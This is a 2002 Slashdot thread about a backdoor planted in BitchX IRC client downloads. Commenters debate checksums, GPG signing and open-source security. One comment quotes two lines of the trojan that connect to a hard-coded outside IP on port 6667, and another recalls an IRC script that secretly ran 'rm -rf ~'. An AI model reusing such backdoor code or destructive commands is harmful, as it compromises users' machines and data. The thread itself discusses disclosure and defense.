Security

BitchX 1.0c19 IRC Client Backdoored 338

Posted by michael
from the what-me-worry dept.
JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"
  • by NASAKnight (588155) on Tuesday July 02, 2002 @08:45AM (#3806938) Homepage Journal
    Local inmates confirmed that there was a problem with people entering into BitchX's backdoor. The suspect is a large man calling himself 'big mamma.'
  • The name.... (Score:3, Interesting)

    by wowbagger (69688) on Tuesday July 02, 2002 @08:46AM (#3806947) Homepage Journal
    Am I the only one who felt a qualm about using this package because of the name?

    BitchX - "I 0NZ0R J00, B1TCH!"

    • Re:The name.... (Score:3, Informative)

      You're not alone, by far. My computer (yes, even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totally my opinion, and some people would argue with me, but my question is: why is this only ever an issue with open source software?
      • Re:The name.... (Score:3, Insightful)

        by dalassa (204012)
        Because most companies have marketing people to hit them on the head and say no, this is not appropriate.
      • Open source only? (Score:2, Interesting)

        by EvilFrog (559066)
        The naming thing isn't necessarily an open source issue, more of a "started by one guy working out of his house who's got a messed up sense of humor and is giving the software away for free so he doesn't have to worry about sales" issue. The same thing comes up whether it's open or closed.

        The popular DOS/Windows emulator "NESticle" comes to mind.
      • BitchX also sends out somewhat crude messages to the IRC channels you're currently on when you /quit the application. Whilst I've no doubt you can turn that feature off, I dislike it greatly. If I choose to use rude, crude and/or lewd language on IRC that's my business (and I do so sometimes), but the mentality that it's a sensible default for a computer to mouth off publicly on your behalf makes me wonder about the maturity of the developers, and thus the quality of the software itself. It's one of the major reasons I use an alternative IRC client.

        This is only an issue with OSS because OSS projects are often the product of one person, unfettered by marketing departments and financial considerations. Sometimes this is good (honest disclosure of a program's bugs and limitations, and realistic schedules for new versions such as "when it's done"), and sometimes this is not so good (you get juvenilia like BitchX, which aside from its bad habits seems to be a full-featured, powerful IRC client).

    • What I found funny was:

      BitchX backdoored
  • Most interesting... (Score:5, Interesting)

    by phreak404 (241139) on Tuesday July 02, 2002 @08:47AM (#3806961)
    Is that when the vulnerability was first submitted, they also submitted some interesting finds about the FTP server on BitchX.com serving trojaned and clean versions depending on the originating IP, demonstrating that the server had (more than likely) been 0wned.

    Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned because of this.
  • Who's this? (Score:5, Informative)

    by Draoi (99421) <.moc.cam. .ta. .thcoiard.> on Tuesday July 02, 2002 @08:48AM (#3806966)
    There's an interesting IP address hard-coded into the trojaned code;

    + sa.sin_port = htons (6667);
    + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
    Doing a reverse-DNS lookup gives;
    ;; QUERY SECTION:
    ;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

    ;; ANSWER SECTION:
    17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
    .... so who are they??
    • Probably the owners of another rooted box...
      • True. At least it's a start - shutdown whatever's collecting data on port 6667 on the 0wn3d box & it'll stop the snoop ....
    • Re:Who's this? (Score:4, Informative)

      by zdzichu (100333) <zdzichu @ i r c .pl> on Tuesday July 02, 2002 @08:52AM (#3807001) Homepage Journal
      inetnum 213.77.115.0 - 213.77.115.255
      netname DATACOM
      descr Datacom
      descr Warszawa Bemowo
      country PL
      admin-c AW7760-RIPE
      tech-c RW7118-RIPE
      status ASSIGNED PA
      mnt-by AS5617-MNT
      changed tkielb@cst.tpsa.pl 20000915
      source RIPE

      (stupidly formatted because of lamefilter)
      • Hey. That's interesting.

        I've been getting SSH scans from a Polish ISP just this week. I don't run BitchX (I use X-Chat), but a backdoor discovered with a Polish IP hardcoded in, and an increase in script kiddie activity from Poland in the same week, doesn't sound like a coincidence to me.

        Mart
    • so who are they??

      set:/ # host 213.77.115.17

      17.115.77.213.IN-ADDR.ARPA domain name pointer wenus.dtcomsa.com


      That wasn't so hard. But if you want, you can find out more [netsol.com].

      Geesh, these tools are just sitting there waiting to be used...
  • It's Odd (Score:3, Interesting)

    by Copperhead (187748) <talbrech@@@speakeasy...net> on Tuesday July 02, 2002 @08:48AM (#3806969) Homepage
    According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't.

    From the post, "There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client / client-behavior based (we're not sure exactly what)."

    The post continues, "To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy."

    Very strange.

    • I'm on a cablemodem and I tried getting the trojaned version hours after this was discovered. Apparently, the ftp server was fixed as I tried from multiple IP addresses and ways... Fortunately, I happened to have the tarball that I compiled from and the md5sum matched the good version.

      Moral of the story: *always* check md5sums, or use a packaging system that checks them for you. Doesn't rpm automatically do this? Gentoo's portage does.
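[A minimal sketch of that check, end to end. The tarball and checksum file here are local stand-ins, not the real BitchX release files.]

```shell
# Simulate what a clean mirror publishes: a tarball plus its MD5 sums.
echo "pretend tarball contents" > bitchx-demo.tar.gz
md5sum bitchx-demo.tar.gz > MD5SUMS

# What a careful downloader runs; prints "bitchx-demo.tar.gz: OK".
md5sum -c MD5SUMS

# A tampered download fails the same check.
echo "trojaned contents" > bitchx-demo.tar.gz
md5sum -c MD5SUMS || echo "checksum mismatch - do not install"
```

[Of course, this only helps if the checksum file itself comes from somewhere the attacker doesn't control.]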
      • If the ftp server was rooted, why couldn't they just replace the md5 sums? Usually I see them as files in the same directory as the tarballs. How hard is it to generate an md5 sum which matches the hacked version?
        • Re:It's Odd (Score:3, Insightful)

          by mindstrm (20013)
          Well, perhaps they wanted to spread it to dumb home users but not to anyone more professional. Perhaps they wanted to go longer without being caught.

          Perhaps it's actually a DNS issue, and it's directing some people to a dummy server.
        • I was under the impression that most people signed MD5SUMS files with PGP/GPG. I know I do.
      • Re:It's Odd (Score:3, Informative)

        by frozenray (308282)
        A user named uid0 made an excellent point in a Usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:

        This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.

        (source [google.com])
        • The intent as I have seen it is that the MD5 sum comes from a different source than the thing being verified. For example, in the portage system the md5sums are part of the tree, and distfiles are checked against those on download. Not the most ideal security, but it is a little more resilient than putting everything in one spot, which would just be pointless.

          So long as there are a concentrated, trusted, experienced few through which things are distributed, then gnupg could be employed to sign files and have those distribution masters' public keys distributed with a distro. The problem here is that source files come from soooo many different maintainers that there would be as many public keys as packages. Of course with Gentoo, instead of the 'portage masters' running md5sums, they could run this sort of signature, so that a more permanent public key would be around to verify files rather than a single vulnerable md5sum.... At that point there would be three increasingly difficult levels to compromise to fool the system...
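[A sketch of that signing scheme with GnuPG. The key is a throwaway generated on the fly and the filenames are stand-ins; a real release key would be created and kept offline, not conjured up in the release script like this.]

```shell
# Throwaway keyring and passphrase-less key, purely for demonstration.
export GNUPGHOME="$(mktemp -d)"
chmod 700 "$GNUPGHOME"
gpg --batch --pinentry-mode loopback --passphrase '' \
    --quick-generate-key maintainer@example.org default default never

# Maintainer side: checksum the release, then detach-sign the checksum file.
echo "pretend tarball contents" > bitchx-demo.tar.gz
md5sum bitchx-demo.tar.gz > MD5SUMS
gpg --batch --yes --detach-sign --armor MD5SUMS   # writes MD5SUMS.asc

# Downloader side: verify the signature first, then the sums.
gpg --verify MD5SUMS.asc MD5SUMS && md5sum -c MD5SUMS
```

[An attacker who roots the mirror can regenerate MD5SUMS to match the trojaned tarball, but can't produce a valid MD5SUMS.asc without the signing key.]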
    • Actually, it makes perfect sense...

      If you were planning a DDoS attack, you'd want to make sure that people on fast but dynamic links (i.e. home users on cable/DSL who might not have good security) would be the ones to report in to the 'home' IP..

      that way, the person who trojaned bitchx would have access to a number of perfect, 'safe', but nice and high-speed clients for doing whatever they want to anyone, with reduced chances of the victims (the backdoored people at least) noticing.

      only serving the trojaned versions to people who fit that description might have been a way to try and keep the backdoor 'low profile' .. the fewer people who get the backdoored version, the less chance of it becoming public. although, obviously in this case it didn't work very well..

      anyway, tiz just an idea.

  • by MattW (97290) <matt@ender.com> on Tuesday July 02, 2002 @08:49AM (#3806972) Homepage
    This reminds me of the good old days, when people distributed like 20 different scripts for the irc2 client, all of which had some backdoor or another. Most of them listened for ctcp commands and would pass them directly to shell. CTCP GROK JUPE CMD ORD -- bonus points to anyone who can name all 4 scripts that had those backdoor commands. Then there were amusing tidbits like scripts that would flood anyone using the author's nick without the right hostmask. Then there was the 'Folger's Crystals' script -- it set your display to off, so you saw nothing even while you joined a channel and were saying, "I've just had all my files secretly replaced by folgers_crystals... let's see what happens!" (meanwhile, the script was executing rm -rf ~).

    Of course, back then, you could blame people for running something they didn't understand, since it was on the order of getting a whack-a-bill game by email and just running it, whereas tainted downloads aren't quite as shameful, but ah, it does bring back the memories of the Wild Days of irc...
  • by XaXXon (202882) <xaxxon@@@gmail...com> on Tuesday July 02, 2002 @08:50AM (#3806977) Homepage
    If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

    Anti-GPL people (read: Microsoft and their lackeys) may try to take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (whether on his/her own or with the blessing of the company), the world may never know. With OSS, it's out in the open for everyone to see/fix.
    • by toupsie (88295) on Tuesday July 02, 2002 @08:59AM (#3807042) Homepage
      If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

      Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

      Disclaimer: I use a closed source IRC product called Ircle [ircle.com].

      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

        I guess the only backdoors in MS software are the ones the developers put there ;)
        • I guess the only backdoors in MS software are the ones the developers put there ;)

          Exactly! Check out this post [slashdot.org] in the same thread. I mentioned exactly this problem!!!

          • I thought that was humor.

            You do know about binary patches, I trust. Backdoors don't require access to the source code. Not if you're good at assembler. (I'm not, but I've had to do binary patches on a couple of mainframe programs a few decades ago.)

            Still, when I first started working with computers binary patches were one of the common changes made to working programs. True, they were small. But with a compiler to generate the binary, all you need to do is patch in a jump to your code, and then a jump back afterwards.

            Perhaps things have really changed in ways that I didn't catch after dropping assembler. If so I'm sure someone will let me know just how stupid I'm being. But I doubt it.
      • Wasn't this supposed backdoor in the ./configure script and not in the finished executable proper? Or was it linked into the executable but not part of the original code of BitchX?

        If so that would make it a viral type infection rather than an error or backdoor in the original BitchX code.
      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

        Are you seriously claiming that it is not possible to modify a binary? It is only slightly more difficult than modifying the source, and if you are doing it for the purposes of spreading backdoored software, the small difference in difficulty is not relevant at all.

        • Are you seriously claiming that it is not possible to modify a binary? It is only slightly more difficult than modifying the source, and if you are doing it for the purposes of spreading backdoored software, the small difference in difficulty is not relevant at all.

          Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

          Did you think about your comment before you typed it? Or did you fail to read my original comment? What you typed makes no sense whatsoever.

          • Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

            Surely the availability of source has nothing to do with the security of an FTP server or the entire network (including DNS) between you and the FTP server.

          • Yes, I am seriously saying that a third party would not modify the binary, give it back to the Software Publisher and have the Software Publisher redistribute the modified binary to the public through their corporate FTP server.

            Then you are seriously deluded. Did YOU even read your own comment? What you are saying is complete and utter nonsense.

            This guy didn't offer it as a patch which was then incorporated into BitchX. The software was modified, the FTP server distributing the software was rooted, the software replaced with the backdoored software (obviously in a sophisticated enough manner to evade casual inspection of the server), and people downloaded it.

            Binaries are an even more useful tool for distributing back doors, because it's even harder to notice, and those as blind to this avenue of attack as you appear to be will cheerfully run these back-doored binaries, believing erroneously that because it is a binary, it's safe. You couldn't be more wrong, and I hope you're never subject to the consequences of your blindness in this area in the future.
      • What makes you think the source wouldn't be on the same machine the FTP server runs on? (I've seen much worse at closed source shops.)
        If they had rooted the machine they _would_ have access to the source, but no white hats would.

      • Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

        Right. Because viruses *never* hijack the functionality of closed-source software. Computer viruses only make open-source programs malfunction.

    • > With OSS, it's out in the open for everyone to see/fix.

      Not really. [acm.org]

    • by torinth (216077) on Tuesday July 02, 2002 @09:32AM (#3807212) Homepage
      If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

      Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (either on his/her own or with the blessing of the company, the world may never know). With OSS, it's out in the open for everyone to see/fix.


      Please. It's open for everyone who has nothing better to do than read Slashdot or Bugtraq, maybe. What much of OSS needs but doesn't have is strict maintainers, who know what contributions are made to the product and know what they'll do before they're let in. Fortunately, some of the bigger projects have this (Linux kernel, *BSD, Mozilla), but a lot of OSS today is about people being too lazy or incompetent to double-check some 15-year-old hax0r's crappy-ass contribution until it's too late.

      The other thing OSS needs to enforce a little better is something along the lines of code signing. From what I can tell, it looks like somebody hijacked the bitchx FTP domain on some routes and is returning trojaned copies to the downloaders who are going through it. This is a weakness of OSS. It's much easier for me to grab a piece of Open Source software, drop some malicious code in it, and redistribute it from a hijacked domain than it is for me to do so with something I don't have the source to. Granted, it's still possible, if I inject code into the compiled version, but it's a hell of a lot easier to do it with source.

      The simplest move is to use MD5s for major releases and have some 3rd-party location to verify them. Freshmeat? SourceForge? This, at least, could add some security, and would add a central point for people to watch out for hijacking...

      Get your head out of the damned OSS-as-a-religion sand and look at what needs to be done to make it viable to people who don't fuck around reading about the next idiot to shoot himself into space in a backyard rocket.

      Meh. Enough ranting, for now.

      -Andrew
    • Not sure, but on my non-OSS operating system I run firewalls and intrusion detection software to help me catch spyware and other things accessing ports I am not aware of. Since I'm not the only one who does this, I would think the backdoor would be found. You don't have to see the source code to find holes if you can observe them in action.

      Frankly I am quite tired of this common belief that thousands of eyes are constantly scanning OSS looking for problems to fix. In the 9 or so years I have been using Linux and GNU software I have never looked for such things. Maybe that is because I am a developer and spend enough time with my own code. Even when I first started with Linux and things like CD-ROMs and NICs required patching and compiling, I was content with the code I was downloading. Hobbyists tended not to screw other hobbyists (unless money is changing hands) and I tend to still believe that. I really doubt there are that many people who police code. If you are working on something and notice a problem then you submit a patch, but the belief that a huge and constant code review is going on is a false one as far as I am concerned.

      With the popularity of Linux and free software, however, and the perceived threat to some commercial software, it might be wise for OSS project leaders to be extra careful of new code that slips in. I have believed for a while that sooner or later we will see companies like Microsoft or Sun let slip some patented code into a free software project just so they can come back later and shut it down with a lawsuit. Face it, these companies are getting hurt. A project like Mono has the potential to hurt .NET and, if successful, hurt Java. I would not have thought that someone would slip a backdoor into a project, however.

      Anyway, I don't think you can look at OSS or a closed source project and say one is more "secure" than the other. I think it really comes down to how it is managed and the quality of the people who are contributing. You might also want to consider the type of application.

      As far as IRC goes, this is a community where you are judged by how "bad-ass" your kick scripts are and your "l33t h4xx0r" skills. I'd be cautious of any IRC tool I used for that matter.
      • True, not all bugs are shallow. And many projects are almost desperately looking for more developers -- which is a scary sign.

        But the way I figure it, new developers have their software scrutinized more closely so you'd figure that someone joining just to mess things up wouldn't ever be really trusted.

        Not that this rules out an entire project whose purpose is simply to release a trojan. Which is why it is a good idea to check the mailing list archives and IRC channels first.

        I know Debian uses package signing. Many other distributions do the same thing.

        So safeguards are in place -- it's just that there's nothing foolproof about them.
        • I know Debian uses package signing. Many other distributions do the same thing.

          Internally, yes, but users can't verify packages...yet. AFAIK, the plan is to go forward with integrating debsig-verify after woody's release.

      • The difference:

        When your closed-source OS's firewall alerts you to a problem, can you find it? Can you fix it?

        Now, when this happens on an open-source OS, can you find and fix it?

        BitchX certainly isn't a critical application. But what if this was your web server? Do you wait until your vendor can supply you a fix, or would you (as a developer) rather tear into the code and fix it in a few minutes?

        That's the big difference. It's not just in the detection, but also in the speed of repair and availability of a fix.

        IMHO, closed-source software is simply not on the ball when it comes to getting patches out within a reasonable amount of time (which, to me, is under 24 hours of being alerted for a critical application). At least with open-source, if the vendor won't help you, you can at least help yourself.
        • Probably only one in 10,000 people running Apache could have found OR fixed that last root exploit on their own machine. So for 9,999 people open source doesn't matter at all.

          What the hell do you think source is, anyway? Have YOU ever looked at it? Do you think any person can just "look" at it and go, "Oh, here it is, I'll just fix it here. There, done."?

          Apache had to fix that bug. And it wasn't in a day either; it took nearly a week. Other people hacked at it. DIDN'T FIX IT, but SAID they did and tried distributing a broken patch. HOORAY OPEN SOURCE!

          We had to wait for the vendor to patch. Just like closed source. Code is generally FAR too complicated for anyone not familiar with it to just start hacking away at a "fix". Especially a "Security fix", which would require full regression testing to make sure the product still works as advertised and that the fix actually worked.

            >Probably only one in 10,000 people running apache could have found OR fixed that last root exploit on their own machine.

            Perhaps so, but if a program were making a connection on a specific port, how hard would a:

            grep -r [port number] *

            really be?

            I would suggest that for many problems, especially backdoors (though certainly not all), the fix should be obvious to anyone who has read a book on C.
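[Concretely, here is that grep in action: we plant the trojan's hard-coded address in a scratch tree standing in for an unpacked tarball, then run the recursive search a suspicious user could aim at the real source. Paths are illustrative.]

```shell
# Stand-in for an unpacked source tarball containing the backdoor line.
mkdir -p /tmp/bitchx-src
printf 'sa.sin_addr.s_addr = inet_addr ("213.77.115.17");\n' \
    > /tmp/bitchx-src/irc.c

# The recursive search the poster suggests; prints file, line number and match.
grep -rn '213\.77\.115\.17' /tmp/bitchx-src
```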

            >Have YOU ever looked at it?

            I've not run into a problem similar to the BitchX one, and others tend to be patched fast enough that it's not a problem.

            However, if I did see the activity that the backdoored BitchX causes, I would certainly have torn into the source.

            Like a surprising number of other people, I only look at the source when I need to. But if I couldn't on those occasions when I needed to, I'd be sunk, or at least very disappointed.

            >And it wasn't in a day either, it took neary a week.

            That's why you have the source. Need a patch faster?

            FIX IT YOURSELF!

            >Other people hacked at it. DIDN'T FIX IT, but SAID they did and tried distributing a broken patch. HOORAY OPEN SOURCE!

            If you're a moron who runs patches from random people thinking that's your fix, well, guess what! That's as dumb as running cracks on windows programs to bypass time limits! Don't come running to me when you do idiotic things.

            >We had to wait for the vendor to patch.

            Only because either your company was too friggin' lame to have an in-house coder, or the program wasn't that important to you.

            My whole point, which you have failed miserably to disprove, is that you can fix open source software yourself if the vendor fails you. If you choose not to do so, that's your problem, not mine.

            >Code is generally FAR too complicated for anyone not familiar with it to just start hacking away at a "fix"

            Either hire competent coders, or don't fix the problem, but instead disable it.

            Disabling a problem might leave you missing features, but it's a hell of a lot easier, and a hell of a lot better than the closed source alternative of simply not running the program at all.

            Case-in-point: Apache can have the problem disabled with a simple config hack if you weren't competent enough to have proper programmers to repair the problem properly.

            In short, don't blame open source for your company's/government's incompetence. And if it isn't for a company/government, I doubt that turning off the service for a week will seriously impede your way of life.
    • Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS,

      Some of us despise the GPL and love open source. Please don't incorrectly associate the two. It may reinforce the popular idea that the GPL is the guardian of everyone and that those who submit to the will of RMS will be saved, but it does nothing but confuse people and obscure the truth. It's no better than saying "People who don't like Microsoft (Mac users) tend to be computer illiterate weenies."

  • ... that Linux is gaining popularity among the crackers. This scenario is well known and has been explained for years. But it remained largely theoretical until this year, it seems to me.

    So, now we can expect people that mostly ignored us to come and crack our servers, install backdoors into our releases. They're probably going to write better viruses, too. I guess this is the price you pay when you become mainstream.

    For years we've told the world how secure our OS was. Err, could be, once configured properly. The time has come, now, to actually do it.
    • Mostly ignored?? What planet have you been on for the past several years?

      Linux has never been ignored, and it can actually be a more desirable break-in from a kiddie perspective, since it's much easier to make use of a broken Linux/Unix box thanks to its inherent flexibility, plus the added bragging rights of having broken something widely thought to be more secure.

      I see regular scans on my servers for wu-ftpd, telnet and OpenBSD ftpd-specific holes. In fact, last year I realised while on the bus home that I hadn't secured a FreeBSD install. The next day I rushed in to secure it, but it was already rooted (thankfully nothing was installed yet).

      Running Linux, Freebsd or even OpenBSD has *never* been an excuse for slacking off on keeping servers updated/secured.

  • Backdoor. (Score:4, Interesting)

    by ldopa1 (465624) on Tuesday July 02, 2002 @08:53AM (#3807007) Homepage Journal
    Is this truly surprising? With the proliferation of "secret" functionality in everything from DVDs [dvdeastereggs.com] to Palm applications [palmlife.com], it seems that a lot of developers take great delight in doing something "on the sly" that will get them noticed.

    While the vast majority of these "easter eggs" are completely harmless, it's only logical to assume that they present an opportunity for malicious activities. I mean, who among us doesn't have SOME "H4X0R" history? Doesn't it follow that some of that will come out when the opportunity to put in a "gift" presents itself?

    Also, this seems to me to be one of the down sides of the Open Source fight. Most of the accomplished hackers that I know are strong advocates of Open Source. It leads me to believe that most of the proponents of Open Source are, or were at some time, at least script kiddies with delusions of grandeur.

    Nobody I know has the time to actually check every line of code in a 200 Meg build for one or two lines of backdoor code, especially when the application is DESIGNED to make and break connections.

    • Re:Backdoor. (Score:2, Interesting)

      by numatrix (242325)
      This was not the developers doing something sly. There has been a recent rash of compromised servers hosting different pieces of software, with backdoors being planted in the ./configure script in a manner similar to the one described in this post. Similarly hit was monkey.org [monkey.org], where some of Dug Song's security tools were compromised. Google cache of Dug's post [216.239.37.100].

      There was another relatively famous piece of software compromised the same way recently as well. Somebody is going to great lengths to put backdoors in the source of some good OSS. Makes you wonder how much is being missed.
    • Re:Backdoor. (Score:3, Insightful)

      by kmellis (442405)
      This is the real security threat for everyone, particularly anyone with sensitive data.

      Viruses and worms have been mostly merely malicious. Same with cracking. And the malice involved is not very great. But what if people get serious about stealing data?

      A few years ago I had an epiphany one night, and waltzed into a network security company the next day.

      "Look", sez me, "Inbound connections and activity are, in the long run, not going to be the real threat. The real threat is trojaned applications that mine for data and somehow send it offsite. You need to be monitoring outbound activity for appropriateness. For example, eventually you're going to see corporate espionage where someone writes an attractive and actually useful little app, then social engineers a targeted person within an organization to download it and compromise security. This is just an example of the general problem."

      They were actually pretty impressed, but the company's strategy was deliberately to avoid concerning itself with viruses or worms (more specifically, they wanted to stay only on the servers, monitoring network activity in a sophisticated manner). But it seemed to me that this was a natural extension of their product and technology. And they thought I was a pretty bright guy, but they didn't know what to do with me. Well, anyway. The irony is that they were only a year or so later bought by one of the big antivirus firms, mostly just to acquire their technology.

      In this particular case, the BitchX irc app, it looks like an outside source injected some backdoor code into the application, and hacked the ftp server to distribute it in a selective manner, presumably to help lower the risk of detection. A lot of effort for not that great of a payoff, really. Here, as is often the case, it's mostly about proving how clever you are.

      But we're starting to see rudimentary examples of what I was warning about with spyware and other apps that make outbound connections that are in some sense illicit. Firewalls monitoring outbound connections can only be so successful given that they're always going to let some through. I know that some of the client based firewalling/monitoring software looks at connections on a per application basis. That's a start.

      Personally, my inclination is that we need a networking monitor that operates like a virus scanner -- on the client, in the background -- that accesses a secured database of allowed application to outbound connection mapping, with secured handling of exceptions or new applications referred to a security admin (ideally) or an admin. This way we don't have to use a brute-force approach that simply locks down all allowed applications and allowed outbound connections in a non-specific, usability-destroying way.
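      As a toy illustration of that allowed-application-to-connection mapping (the file names and entries below are invented for the example, and real monitoring would of course observe live traffic rather than a flat file):

```shell
# Approved (application, destination port) pairs -- the "secured database".
cat > allowed.txt <<'EOF'
mozilla 80
fetchmail 110
EOF

# Pretend this is what the client-side monitor actually observed.
cat > observed.txt <<'EOF'
mozilla 80
bitchx 6667
EOF

# Anything observed but not in the allowed mapping gets flagged
# for referral to the security admin.
grep -v -x -f allowed.txt observed.txt
```

      Running this prints only the unexpected pair (`bitchx 6667`), which is exactly the exception a human would then review.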

      But whatever the solution, I have little doubt that this will be a growing problem which will make a transition from script-kiddie nuisance cracking to something much more sophisticated. Although I could be wrong.

  • by Cyclops (1852) <(rms) (at) (1407.org)> on Tuesday July 02, 2002 @08:54AM (#3807009) Homepage
    Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

    Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.
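    A two-line demonstration of why (this sketch assumes GNU coreutils' md5sum, and the file names are made up):

```shell
# An md5sum published alongside the sources proves nothing: whoever can
# replace the tarball can regenerate the checksum just as easily.
printf 'legitimate source\n' > release.tar.gz
md5sum release.tar.gz > release.tar.gz.md5
md5sum -c release.tar.gz.md5                  # passes, as expected

printf 'trojaned source\n' > release.tar.gz   # attacker swaps the file...
md5sum release.tar.gz > release.tar.gz.md5    # ...and the checksum with it
md5sum -c release.tar.gz.md5                  # still passes
```

    The second check succeeds even though the file is now trojaned, which is the whole problem: the checksum only proves the download matches the checksum, not that either came from the developer.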

    A digital signature (I suggest using gpg) can only be generated by YOU, provided you keep the private key in a secure place and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is, recognized) by third parties... the more trustworthy these third parties are, the better.

    After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

    A lot of people instinctively trust their DNS resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. DNS can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

    The more a project grows in fame, the more likely a target it becomes for these kinds of attacks, and so the greater the need for a degree of responsibility that should not be necessary, but unfortunately is, since the danger is ubiquitous.

    Be careful, be very careful.

    Also, avoid using the root user, period.
    • I am signing all my sources with GnuPG. However, the problem is that it is not enough to verify the signature - if you want to trust signed source, you also need to verify the key (fingerprint), and in my experience almost nobody does that, presumably out of laziness.
  • by splorf (569185) on Tuesday July 02, 2002 @08:58AM (#3807032)
    I'm sorry but this is one thing Microsoft and/or Netscape did right. The practice of including detached PGP signatures on download sites is useless--they have to be manually verified, and hardly anyone bothers.

    GNU/Linux downloads should be in signed archives like Netscape JAR files. JAR files are basically ZIP archives with a signature file stored inside the .zip in a standard place. When you unpack the archive, the unpacker checks the signature the same way a browser checks an SSL web site.

    JAR files use a certificate chain ending in a certificate authority (usually a commercial one) but maybe the signed-download scheme could be signed against a certificate on the official developer's website. Of course that wouldn't be unspoofable, but it would be as secure as the current scheme of having a PGP public key on the developer website and signing against that. The main benefit is the checking would happen automatically, so it would be much harder to put crap into downloads. If someone makes a modified version, they would have to sign it themselves (with a signature pointing back to their own website) or else the unpacker would print a message saying the code was unsigned and the user should check it carefully before using it.

    • RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.
    • Valid point, but saying 'GNU/Linux' needs this is *way* too broad of a topic to address. That's not much more helpful than saying 'computer oses need signed download' (here comes Palladium...).

      GNU/Linux, and *any* OS for that matter, has the potential to provide for this sort of thing. The GNU/Linux layers (the kernel and basic system utilities) are too low a level to require this stuff. The difference between doing it by hand and doing it with a yes/no dialog is simply a matter of a simple utility integrated into a distribution, plus some signatures/public keys distributed in advance through a trusted channel. In some form or another, it is already in place for a lot of things.

      For example, I use gentoo and *always* install through the portage system. The portage tree includes ebuild build descriptions and md5sums for the distribution files. This requires an attacker to compromise the portage tree and also provide/hijack the distribution files for that package. Not perfect, but not too shabby. The emerge process always checks MD5s.

      I'm not sure if apt-get, urpmi, apt-rpm, or the FreeBSD ports systems do this, but even if they didn't it wouldn't be a huge leap to add this functionality.

      Perhaps the better thing to come away from this knowing is that sometimes package management holds the answer. Sure, you can download and check signatures manually, but many don't, so having a package distribution system that forces the issue can slow issues like these drastically.
    • RPM, the standard packaging system according to the Linux Standard Base, had support for PGP (IIRC) around three years ago. This was replaced/upgraded with GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made available soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signatures have always been correct).

      Dpkg also recently added GPG support, but you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working on Debian from Albania, trojaning packages.
  • Enough talk (Score:3, Funny)

    by WildBeast (189336) on Tuesday July 02, 2002 @09:18AM (#3807138) Journal
    Grow up, nothing is perfectly secure. Let's stop arguing about which OS is vulnerable and find the evil-doers who did this. Let's smoke them out of their parents' basement and deliver a Slashdot can of whoop-ass.
  • . . . you wouldn't be vulnerable to back doors inserted by rogue programmers in configure scripts. You would only be vulnerable to back doors authorized by Microsoft and the U.S. Government to prevent piracy and terrorism.
  • GnuPG (Score:2, Insightful)

    by giminy (94188)
    If more people used GnuPG [gnupg.org] and checked the signatures on their software, we wouldn't have to worry as much about backdoored software (assuming, of course, that you trust the original author. And if you don't, then you shouldn't be using their software now should you?). One of these days someone is going to do something like this with something major, like the kernel, and it's going to affect a lot of people. So start checking now!
  • by teslatug (543527)
    Finally vindication for all those who made fun of me for using XChat...
  • Backdoored? (Score:3, Funny)

